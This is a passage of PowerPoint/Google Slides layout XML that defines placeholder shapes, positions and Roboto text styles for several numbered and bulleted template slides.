            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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97" name="Google Shape;1397;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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98" name="Google Shape;1398;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1399" name="Google Shape;1399;p75"/>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1400" name="Google Shape;1400;p75"/>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01" name="Google Shape;1401;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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02" name="Google Shape;1402;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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3" name="Google Shape;1403;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1404" name="Google Shape;1404;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1405" name="Google Shape;1405;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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06" name="Google Shape;1406;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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07" name="Google Shape;1407;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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8" name="Google Shape;1408;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1409" name="Google Shape;1409;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1410" name="Google Shape;1410;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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11" name="Google Shape;1411;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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12" name="Google Shape;1412;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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13" name="Google Shape;1413;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1414" name="Google Shape;1414;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1415" name="Google Shape;1415;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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16" name="Google Shape;1416;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2135375"/>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17" name="Google Shape;1417;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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18" name="Google Shape;1418;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1419" name="Google Shape;1419;p75"/>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1420" name="Google Shape;1420;p75"/>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21" name="Google Shape;1421;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="25735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22" name="Google Shape;1422;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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23" name="Google Shape;1423;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1424" name="Google Shape;1424;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1425" name="Google Shape;1425;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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26" name="Google Shape;1426;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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27" name="Google Shape;1427;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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28" name="Google Shape;1428;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1429" name="Google Shape;1429;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1430" name="Google Shape;1430;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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31" name="Google Shape;1431;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>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24. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1432"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433" name="Google Shape;1433;p7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34" name="Google Shape;1434;p7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435" name="Google Shape;1435;p7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436" name="Google Shape;1436;p7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437" name="Google Shape;1437;p7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438" name="Google Shape;1438;p7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439" name="Google Shape;1439;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1440" name="Google Shape;1440;p76"/>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1441" name="Google Shape;1441;p76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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42" name="Google Shape;1442;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275"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444" name="Google Shape;1444;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1445" name="Google Shape;1445;p76"/>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1446" name="Google Shape;1446;p76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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47" name="Google Shape;1447;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050"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76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050"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449" name="Google Shape;1449;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1450" name="Google Shape;1450;p76"/>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1451" name="Google Shape;1451;p76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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52" name="Google Shape;1452;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="193852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76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="193858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25. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1454"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1455" name="Google Shape;1455;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286263" y="1183050"/>
            <a:ext cx="827470" cy="3662574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1456" name="Google Shape;1456;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="142355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7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58" name="Google Shape;1458;p7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459" name="Google Shape;1459;p7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460" name="Google Shape;1460;p7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461" name="Google Shape;1461;p7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462" name="Google Shape;1462;p7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463" name="Google Shape;1463;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457206" y="1421303"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1464" name="Google Shape;1464;p77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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1465" name="Google Shape;1465;p77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="34032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66" name="Google Shape;1466;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2135850"/>
            <a:ext cx="4298400" cy="25446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67" name="Google Shape;1467;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="1423475"/>
            <a:ext cx="3057600" cy="476100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="0" rIns="457200" bIns="0" anchor="ctr"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68" name="Google Shape;1468;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555425" y="142580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69" name="Google Shape;1469;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4936306" y="1423553"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1470" name="Google Shape;1470;p77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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1471" name="Google Shape;1471;p77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="34032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72" name="Google Shape;1472;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="2138100"/>
            <a:ext cx="4298400" cy="25446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73" name="Google Shape;1473;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555425" y="1425725"/>
            <a:ext cx="3057600" cy="476100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="0" rIns="457200" bIns="0" anchor="ctr"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26. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1474"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Google Shape;1475;p7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76" name="Google Shape;1476;p7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477" name="Google Shape;1477;p7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478" name="Google Shape;1478;p7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479" name="Google Shape;1479;p7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480" name="Google Shape;1480;p7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81" name="Google Shape;1481;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="125272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01</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="127657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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="127657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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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02</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Google Shape;1487;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="262237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03</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1488" name="Google Shape;1488;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="264622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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="264622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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="340822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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="340822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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="338437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04</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1493" name="Google Shape;1493;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1494" name="Google Shape;1494;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>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78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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97" name="Google Shape;1497;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="2648175"/>
            <a:ext cx="9168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99" name="Google Shape;1499;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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00" name="Google Shape;1500;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="9168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guide id="2" pos="5460">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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27. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1501"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
